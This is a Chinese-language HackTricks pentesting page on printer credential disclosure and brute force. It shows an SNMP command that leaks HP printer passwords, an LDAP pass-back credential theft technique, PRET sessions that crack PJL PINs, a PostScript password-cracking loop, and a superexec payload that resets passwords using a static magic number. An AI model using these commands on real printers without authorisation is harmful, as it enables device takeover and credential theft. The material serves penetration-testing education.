hacktricks/network-services-pentesting/pentesting-printers/credentials-disclosure-brute-force.md

凭证泄露 / 暴力破解

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一家网络安全公司工作吗？想要在HackTricks中宣传你的公司吗？或者你想要获取PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划！

• 发现我们的独家NFTs收藏品——The PEASS Family

• 获取官方PEASS和HackTricks周边产品

• 加入 💬 Discord群组 或 Telegram群组，或者关注我在Twitter上的🐦@carlospolopm。

• 通过向hacktricks仓库和hacktricks-cloud仓库提交PR来分享你的黑客技巧。

打印机通常使用默认密码或根本没有初始密码进行部署。在这两种情况下，最终用户或管理员必须主动设置密码以保护设备。

密码泄露

SNMP

古老的HP打印机存在一个返回密码的易受攻击的OID。其他供应商可能也存在类似基于SNMP的问题。

snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 …

Pass-Back

如果打印机使用外部LDAP对人员进行授权。如果您可以访问更改此设置（可能使用Web控制台界面），您可以使打印机连接到您的LDAP服务器并授权任何用户。请注意，您还可以滥用此设置来窃取打印机用于连接到LDAP服务器的凭据。在此处阅读更多信息。

Brute-Force

PJL

由于其仅有16位密钥大小，PJL密码容易受到暴力破解攻击的影响。在不到30分钟的时间内，您可以猜测出正确的密码。

您可以使用PRET的lock和unlock命令来测试暴力破解：

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
PIN protection:  ENABLED
Panel lock:      ON
Disk lock:       ON
printer:/> unlock
No PIN given, cracking.
PIN protection:  DISABLED
Panel lock:      OFF
Disk lock:       OFF

PostScript

PostScript提供两种类型的密码：SystemParamsPassword用于更改打印作业设置，如纸张大小，而StartJobPassword则需要退出服务器循环，从而永久更改PostScript环境。

针对PostScript密码的暴力攻击可以非常快速地执行，因为PostScript解释器可以被编程为直接破解自身：

/min 0 def /max 1000000 def
statusdict begin {
min 1 max
{dup checkpassword {== flush stop} {pop} ifelse} for
} stopped pop

另一种方法是通过使用Adobe的专有superexec运算符来绕过PostScript密码并将其重置。该运算符位于internaldict字典中，该字典由一个静态的、魔术密码（1183615869）进行“保护”。将PostScript代码包装到superexec中允许攻击者忽略语言的各种保护机制，这通常会引发invalidaccess错误。可以使用以下示例设置PostScript密码，而无需首先提交当前密码：

{ << /SystemParamsPassword (0)
/StartJobPassword (0) >> setsystemparams
} 1183615869 internaldict /superexec get exec

PRET的锁定和解锁命令可用于对数字（整数）PostScript密码进行暴力破解攻击的测试，或者通过superexec magic绕过这些密码：

./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
printer:/> unlock
No password given, cracking.
Device unlocked with password: 999
printer:/> lock S0me_Re4lly_g00d_Passw0rd!
printer:/> unlock bypass
Resetting password to zero with super-secret PostScript magic
Device unlocked with password: 0

有关密码泄露和暴力破解的更多信息，请访问 http://hacking-printers.net/wiki/index.php/Credential_disclosure

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一家网络安全公司工作吗？想要在HackTricks中宣传你的公司吗？或者你想要获取最新版本的PEASS或下载PDF格式的HackTricks吗？请查看订阅计划！

• 发现我们的独家NFTs收藏品——The PEASS Family

• 获得官方PEASS和HackTricks周边产品

• 加入💬 Discord群组 或电报群组 或在Twitter上关注我🐦@carlospolopm。

• 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。